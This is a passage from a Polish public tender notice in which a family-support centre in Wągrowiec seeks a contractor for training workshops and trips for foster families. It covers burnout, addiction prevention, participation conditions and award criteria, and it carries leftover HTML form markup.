2018r. ( wyjazd w systemie częściowo weekendowym tj. od czwartku do niedzieli )3/. Dwa wyjazdy warsztatowe dla Pań pełniących funkcję rodziny zastępczej i rodzinnego domu dziecka. Łącznie w warsztatach uczestniczyć będzie 77 kobiet. Problematyka warsztatów: ,,Wypalenie zawodowe i przeciwdziałanie rezygnacji z pełnienia funkcji rodziny zastępczej", w tym : - efektywne funkcjonowanie w sytuacji stresu i konfliktu, styl i strategia radzenia sobie ze stresem, zarządzaniem konfliktem - 15h- wypalenie zawodowe - rozpoznawanie i przeciwdziałanie, w tym przyczyny wypalenia, wzmocnienia własnych zasobów - 20ha. warsztat wyjazdowy dla 37 osób - kobiet z rodzin zastępczych zawodowych i rodzinnych domów dziecka.Przedmiot zamówienia obejmuje: 1/. zakwaterowanie i wyżywienie dla 37 osób przez 3 pełne doby,2/. zapewnienie transportu z miejsca wyjazdu (Wągrowiec - siedziba PCPR ul. Wierzbowa 1 ) do miejsca zakwaterowania i z miejsca zakwaterowania do Wągrowca ( siedziby PCPR ),3/. zapewnienie Sali szkoleniowej, 4/.zapewnienie co najmniej 2 trenerów - łącznie 35h szkolenia, 5/. zapewnienie materiałów szkoleniowych dla każdej osoby na które składają notatnik i długopis, listy obecności, zaświadczeń dla każdej osoby z ukończenia szkolenia z potwierdzeniem na liście odbioru zaświadczenia, poczęstunku oraz zakwaterowania i wyżywienia, 6/. zapewnienie drobnego poczęstunku w trakcie szkolenia (kawa, herbata, woda, susz konferencyjny, naczynia jednorazowe ), 7/. ubezpieczenie uczestników warsztatów przez cały okres pobytu.Termin szkolenia: Listopad 2017r. ( wyjazd w systemie częściowo weekendowym tj. od czwartku do niedzieli )b. warsztat wyjazdowy dla 40 osób - kobiet z rodzin niezawodowych i spokrewnionychPrzedmiot zamówienia obejmuje: 1/. zakwaterowanie i wyżywienie dla 40 osób przez 3 pełne doby,2/. zapewnienie transportu z miejsca wyjazdu (Wągrowiec - siedziba PCPR ul. Wierzbowa 1 ) do miejsca zakwaterowania i z miejsca zakwaterowania do Wągrowca ( siedziby PCPR ),3/. zapewnienie Sali szkoleniowej , 4/.zapewnienie co najmniej 2 trenerów - łącznie 35h szkolenia, 5/. zapewnienie materiałów szkoleniowych dla każdej osoby na które składają notatnik i długopis, listy obecności, zaświadczeń dla każdej osoby z ukończenia szkolenia z potwierdzeniem na liście odbioru zaświadczenia, poczęstunku oraz zakwaterowania i wyżywienia, 6/. zapewnienie drobnego poczęstunku w trakcie szkolenia (kawa, herbata, woda, susz konferencyjny, naczynia jednorazowe ), 7/. ubezpieczenie uczestników warsztatów przez cały okres pobytu.Termin szkolenia: Czerwiec 2018r. ( wyjazd w systemie częściowo weekendowym tj. od czwartku do niedzieli )III część zamówienia: Warsztaty stacjonarne dla rodzinnych form pieczy zastępczej - przeciwdziałanie uzależnieniom.Program warsztatów obejmuje działania mające na celu przeciwdziałaniu uzależnieniom, podnoszenie kompetencji i umiejętności postepowania, reagowania i szukania pomocy, działania opiekunów młodzieży uzależnionej lub zagrożonej uzależnieniem. Warsztaty skierowane są do 20 wychowanków z pieczy zastępczej oraz 30 opiekunów - łącznie 50 osób.W zakresie kwalifikacji specjalistów wymagane jest wykształcenie wyższe kierunkowe, zgodnie z przedmiotem zamówienia. Przedmiot zamówienia obejmuje:1.	Warsztaty grupowe dla młodzieży i opiekunów ze specjalistą psychologiem - 20h ( wynagrodzenie specjalisty)2.	Warsztaty grupowe dla młodzieży i opiekunów ze specjalistą terapeutą uzależnień - 25h ( wynagrodzenie specjalisty )3.	Dostęp do konsultacji indywidualnych ze specjalistą psychologiem/terapeutą uzależnień dla każdego uczestnika projektu w wymiarze 1h tj. łącznie 50h4.	Wynajem Sali dla warsztatów grupowych i konsultacji indywidulanych 5.	Zapewnienie materiałów w przypadku warsztatów grupowych ( notatnik + długopis )6.	Zapewnienie drobnego poczęstunku ( napoje, susz konferencyjny, naczynia jednorazowe) na spotkaniach grupowych.Miejsce realizacji zamówienia miasto Wągrowiec.Termin realizacji zamówienia: od podpisania umowy tj. przybliżony termin pierwszych zajęć miesiąc listopad 2017r. ( od poniedziałku do piątku w godzinach popołudniowych )</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">80500000-9</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>63500000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>55300000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>55100000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>60172000-4</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia">2017-11-04</span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2018-12-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie precyzuje warunku w tym zakresie, ocena spełnienia warunku na podstawie oświadczenia stanowiącego załącznik nr 2 do SIWZ odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia oraz przedłoży opłaconą polisę a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie o spełnianiu warunków udziału w postępowaniu o udzielenie zamówienia. Wykonawcy udokumentują posiadanie wiedzy i doświadczenia poprzez wykazanie wykonanych w zakresie organizacji szkoleń w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy i usługi zostały wykonane - w tym co najmniej zorganizowanie i przeprowadzenie 1 wyjazdu szkoleniowego w zakresie objętym zamówieniem - oraz załączą dowody (poświadczenia, oświadczenia), czy zostały wykonane lub są wykonywane należycie. </span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow"></span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">Odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia spełnienia przez Wykonawca udokumentuje posiadanie wiedzy i doświadczenia poprzez wykazanie wykonanych w zakresie organizacji szkoleń w okresie ostatnich trzech lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy i usługi zostały wykonane - w tym co najmniej zorganizowanie i przeprowadzenie 1 wyjazdu szkoleniowego w zakresie objętym zamówieniem - oraz załączą dowody (poświadczenia, oświadczenia), czy zostały wykonane lub są wykonywane należycie - zgodnie z załącznikiem nr 5 do SIWZ. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">Zgodnie z przedmiotem zamówienia określonym w SIWZ, Zamawiający nie dopuszcza realizacji przedmiotu zamówienia przez podwykonawców poza: wynajmem transportu, ubezpieczeniem, zakwaterowaniem, wyżywieniem. Wykonawca wskaże w Formularzu ofertowym, część zamówienia, której wykonanie zamierza powierzyć podwykonawcom, zgodnie z art. 36a i b ustawy Pzp. , spełnienie warunku zgodnie z załącznikiem nr 6 do SIWZ. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>80,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Doświadczenie w organizacji szkolenia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Zamawiający przewiduje zmiany w umowie w następujący sposób:1.	Zmiana umowy może nastąpić w formie pisemnej pod rygorem nieważności.2.	Umowa może zostać zmieniona w następujących przypadkach:a.	zmiana terminu realizacji przedmiotu umowy;b.	zmian przypisów prawnych dotyczących realizacji usług będących przedmiotem umowy;c.	zmiana składu osobowego kadry realizującej usługi wyznaczonej przez Wykonawcę w ofercie do realizacji zamówienia, pod warunkiem, że osoby wskazane przez Wykonawcę będą spełniać warunki wskazane w SIWZ;3.	W przypadku wystąpienia siły wyższej, za którą uważa się zdarzenia o charakterze nadzwyczajnym, występujące po zawarciu umowy , a których Strony nie były w stanie przewidzieć w momencie jej zawierania, i których zaistnienie lub skutki uniemożliwiają wykonanie umowy zgodnie z jej treścią, Strona dotknięta jej działaniem, niezwłocznie poinformuje drugą stronę o jej zaistnieniu oraz, o ile będzie to możliwe, przedstawi niebudzące wątpliwości dokumenty potwierdzające jej wystąpienie. Obie strony niezwłocznie od dnia otrzymania powyższej informacji uzgodnią tryb dalszego postępowania.</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania">Jeżeli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa, powinny one być umieszczone w osobnej wewnętrznej kopercie zatytułowanej jak ppkt 13, z dodaniem słów ,,Tajemnica przedsiębiorstwa". Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 Pzp. Informacje 